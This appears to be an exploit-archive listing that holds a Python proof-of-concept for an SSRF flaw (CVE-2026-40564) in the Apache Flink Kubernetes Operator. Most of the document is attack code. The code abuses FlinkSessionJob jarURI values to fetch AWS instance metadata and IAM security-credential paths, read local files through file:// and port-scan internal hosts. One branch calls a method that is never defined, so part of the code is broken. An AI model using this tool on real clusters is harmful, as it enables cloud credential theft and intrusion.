Share
## https://sploitus.com/exploit?id=PACKETSTORM:223525
==================================================================================================================================
    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://flink.apache.org/                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    :  This is a standalone Python 3 command-line proof-of-concept script for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import sys
    import time
    import urllib.request
    import urllib.parse
    import ssl
    import re
    from typing import Optional, Dict, List, Tuple
    
    class FlinkOperatorSSRF:
        def __init__(self, api_server: str, token: str = None, namespace: str = "default", 
                     verify_ssl: bool = False, timeout: int = 30):
            self.api_server = api_server.rstrip('/')
            self.namespace = namespace
            self.timeout = timeout
            self.verify_ssl = verify_ssl
            self.headers = {
                'Content-Type': 'application/json'
            }
            
            if token:
                self.headers['Authorization'] = f'Bearer {token}'
    
            self.ctx = ssl.create_default_context()
            if not verify_ssl:
                self.ctx.check_hostname = False
                self.ctx.verify_mode = ssl.CERT_NONE
        
        def log(self, msg: str, level: str = "INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
            """Make Kubernetes API request"""
            url = f"{self.api_server}{path}"
            req = urllib.request.Request(url, method=method, headers=self.headers)
            
            if data:
                req.add_header('Content-Type', 'application/json')
                req.data = json.dumps(data).encode('utf-8')
            
            try:
                with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
                    body = resp.read().decode('utf-8')
                    if body:
                        return resp.status, json.loads(body)
                    return resp.status, None
            except urllib.error.HTTPError as e:
                if e.code == 409:  # Conflict - resource may already exist
                    return e.code, None
                body = e.read().decode('utf-8') if e.fp else ''
                self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
                return e.code, None
            except Exception as e:
                self.log(f"Request failed: {e}", "ERROR")
                return None, None
        
        def find_operator_pod(self) -> Optional[str]:
            """Find Flink operator pod in the cluster"""
            self.log("Searching for Flink operator pod...", "PROC")
            
            status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
            
            if status == 200 and pods:
                for pod in pods.get('items', []):
                    name = pod.get('metadata', {}).get('name', '')
                    if 'flink-kubernetes-operator' in name.lower():
                        self.log(f"Found operator pod: {name}", "SUCCESS")
                        return name
            
            self.log("Could not find operator pod", "WARNING")
            return None
        
        def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
            """Fetch operator pod logs"""
            status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
            
            if status == 200:
                return logs if isinstance(logs, str) else str(logs)
            
            return None
        
        def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
            """Create malicious FlinkSessionJob"""
            manifest = {
                "apiVersion": "flink.apache.org/v1beta1",
                "kind": "FlinkSessionJob",
                "metadata": {
                    "name": name,
                    "namespace": self.namespace
                },
                "spec": {
                    "job": {
                        "jarURI": jar_uri,
                        "parallelism": 1,
                        "upgradeMode": "stateless"
                    },
                    "flinkConfiguration": {},
                    "jobManager": {},
                    "taskManager": {}
                }
            }
            
            status, _ = self.k8s_request(
                'POST',
                f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
                manifest
            )
            
            if status == 201:
                self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
                return True
            
            self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
            return False
        
        def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
            """Delete Kubernetes resource"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, _ = self.k8s_request('DELETE', path)
            
            if status in [200, 202, 204]:
                self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
                return True
            
            return False
        
        def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
            """Get resource status"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, data = self.k8s_request('GET', path)
            
            if status == 200:
                return data
            
            return None
        
        def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
            """Execute SSRF attack"""
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            resource_name = f"ssrf-{int(time.time())}"
            
            self.log(f"Creating SSRF resource: {resource_name}", "PROC")
            self.log(f"Target URL: {jar_uri}")
    
            if use_session_cluster:
                success = self.create_flink_session_job(resource_name, jar_uri)
            else:
                success = self.create_flink_deployment(resource_name, jar_uri)
            
            if not success:
                return False
            self.log("Waiting for operator reconciliation (15s)...", "PROC")
            time.sleep(15)
            status = self.get_resource_status(resource_name, resource_type)
            
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                self.log(f"Resource status: {status_text[:200]}...")
                error_keywords = [
                    'Failed to fetch',
                    'Connection refused',
                    'connect timed out',
                    'UnknownHostException',
                    'FileNotFoundException'
                ]
                
                for keyword in error_keywords:
                    if keyword in status_text:
                        self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
                        break
            operator_pod = self.find_operator_pod()
            if operator_pod:
                self.log("Fetching operator logs...", "PROC")
                logs = self.get_operator_logs(operator_pod, 200)
                
                if logs and jar_uri in logs:
                    self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
    
                    if 'GET' in logs and jar_uri in logs:
                        self.log("HTTP GET request confirmed in logs", "SUCCESS")
                    ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
                    if ua_match:
                        self.log(f"User-Agent: {ua_match.group(1)}")
            self.log("Cleaning up resources...", "PROC")
            self.delete_resource(resource_name, resource_type)
            
            return True
        
        def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
            """Attempt to read AWS instance metadata"""
            self.log("Attempting to read AWS metadata via SSRF...", "PROC")
            
            metadata_urls = [
                "http://169.254.169.254/latest/meta-data/",
                "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "http://169.254.169.254/latest/user-data/",
                "http://169.254.169.254/latest/dynamic/instance-identity/document"
            ]
            results = {}
            for url in metadata_urls:
                self.log(f"Trying: {url}")
                resource_name = f"ssrf-metadata-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(10)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
    
                    if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
                        self.log(f"Metadata found at {url}!", "SUCCESS")
                        roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
                        results[url] = status_text
                        
                        for role in roles:
                            if len(role) > 3 and not role.isdigit():
                                self.log(f"  Role: {role}")
                self.delete_resource(resource_name, resource_type)
                time.sleep(1)
            return results if results else None
        def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
            """Attempt to read local file via file:// scheme"""
            self.log(f"Attempting to read file: {filepath}", "PROC")
            jar_uri = f"file://{filepath}"
            resource_name = f"ssrf-file-{int(time.time())}"
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            if use_session_cluster:
                self.create_flink_session_job(resource_name, jar_uri)
            else:
                self.create_flink_deployment(resource_name, jar_uri)
            time.sleep(10)
            status = self.get_resource_status(resource_name, resource_type)
            content = None
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                if 'file://' in status_text:
                    file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
                    if file_content:
                        content = file_content.group(1)
                        self.log(f"File content extracted:", "SUCCESS")
                        print("\n" + "=" * 65)
                        print(content)
                        print("=" * 65)
            
            self.delete_resource(resource_name, resource_type)
            return content
        
        def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
            """Scan internal ports via SSRF"""
            self.log(f"Scanning {host} ports: {ports}", "PROC")
            
            open_ports = []
            
            for port in ports:
                url = f"http://{host}:{port}/"
                self.log(f"Testing port {port}...")
                
                resource_name = f"ssrf-scan-{port}-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(5)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
                    
                    if 'Connection refused' in status_text:
                        self.log(f"Port {port}: closed")
                    elif 'connect timed out' in status_text:
                        self.log(f"Port {port}: timeout (maybe filtered)")
                    elif 'Failed to fetch' not in status_text:
                        self.log(f"Port {port}: OPEN or responding", "SUCCESS")
                        open_ports.append(port)
                
                self.delete_resource(resource_name, resource_type)
            return open_ports
        def run(self, ssrf_url: str = None, use_session_cluster: bool = True, 
                read_metadata: bool = False, read_file: str = None,
                scan_host: str = None, scan_ports: List[int] = None) -> bool:
            """Main exploit routine"""
            self.log(f"Target: {self.api_server}")
            self.log(f"Namespace: {self.namespace}")
            status, _ = self.k8s_request('GET', '/version')
            if status != 200:
                self.log("Cannot connect to Kubernetes API", "ERROR")
                return False
            self.log("Connected to Kubernetes API", "SUCCESS")
            if read_metadata:
                metadata = self.read_aws_metadata(use_session_cluster)
                if metadata:
                    self.log("AWS metadata extraction complete", "SUCCESS")
                    return True
            elif read_file:
                content = self.read_local_file(read_file, use_session_cluster)
                if content:
                    return True
            elif scan_host and scan_ports:
                open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
                if open_ports:
                    self.log(f"Open ports: {open_ports}", "SUCCESS")
                return bool(open_ports)
            elif ssrf_url:
                return self.check_ssrf(ssrf_url, use_session_cluster)
            else:
                self.log("No action specified", "ERROR")
                return False
    def main():
        """Parse the command line, validate it, run the selected action and exit.

        Exits with status 0 when ``FlinkOperatorSSRF.run`` reports success and 1
        otherwise. An invalid ``--scan-ports`` value is rejected through
        ``parser.error`` (exit status 2) before anything else happens.
        """
        parser = argparse.ArgumentParser(
            description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
        )
        parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
        parser.add_argument("--token", help="Bearer token for authentication")
        parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
        parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
        parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
        parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
        parser.add_argument("--read-file", help="Read local file via file:// scheme")
        parser.add_argument("--scan-host", help="Host to scan for open ports")
        parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
        parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout")

        args = parser.parse_args()

        # Validate the port list up front so bad input yields a usage error, not a traceback.
        scan_ports = None
        if args.scan_ports:
            scan_ports = []
            for raw in args.scan_ports.split(','):
                raw = raw.strip()
                if not raw:
                    continue  # tolerate "80,,443" and trailing commas
                try:
                    port = int(raw)
                except ValueError:
                    parser.error(f"invalid port in --scan-ports: {raw!r}")
                if not 1 <= port <= 65535:
                    parser.error(f"port out of range in --scan-ports: {port}")
                scan_ports.append(port)
            if not scan_ports:
                parser.error("--scan-ports did not contain any port numbers")

        print("""
    ╔════════════════════════════════════════════════════════════════╗
    ║  CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF        ║
    ║  Server-Side Request Forgery via jarURI                        ║
    ╚════════════════════════════════════════════════════════════════╝
        """)

        exploit = FlinkOperatorSSRF(
            api_server=args.api_server,
            token=args.token,
            namespace=args.namespace,
            verify_ssl=not args.insecure,
            timeout=args.timeout
        )

        success = exploit.run(
            ssrf_url=args.ssrf_url,
            use_session_cluster=not args.use_deployment,
            read_metadata=args.read_aws_metadata,
            read_file=args.read_file,
            scan_host=args.scan_host,
            scan_ports=scan_ports
        )

        sys.exit(0 if success else 1)
    # Run the command-line entry point only when executed as a script, not on import.
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================